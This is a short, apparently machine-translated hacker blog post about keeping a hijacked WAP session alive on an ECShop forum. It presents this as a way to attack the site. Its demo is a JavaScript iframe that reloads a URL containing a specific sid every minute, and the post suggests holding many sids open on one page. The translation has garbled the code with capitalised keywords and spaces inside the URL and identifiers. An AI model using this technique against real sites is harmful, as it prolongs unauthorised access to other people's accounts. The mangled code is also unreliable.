The soul of an empty prodigal soul
Let's talk about session persistence. Because the session will always expire, You need to refresh it all the time. Remember the session persistence tool written by cnqing. In fact, to attack wap, you do not need to maintain the actual session. What you need is sid. We only need the following javascript code to keep this sid. The principle is that wap authentication uses sid instead of session, so it takes only one minute to send a get request with sid.
DEMO:
<Script> // the address of the session to be maintained. Var url = "http://bbs.ecshop.com/wap/index.php? Sid = 1oALS7 "; window. setInterval ("keepsid ()", 60000); function keepsid () {document. getElementById ("iframe1 "). src = url + "& time =" + Math. random () ;}</script> <iframe id = "iframe1" src = ""> </iframe> the above Code only needs to be saved as an htm file and opened in a browser. You can even have N multiple iframe and N multiple sid on a page while maintaining them. They can be different sid.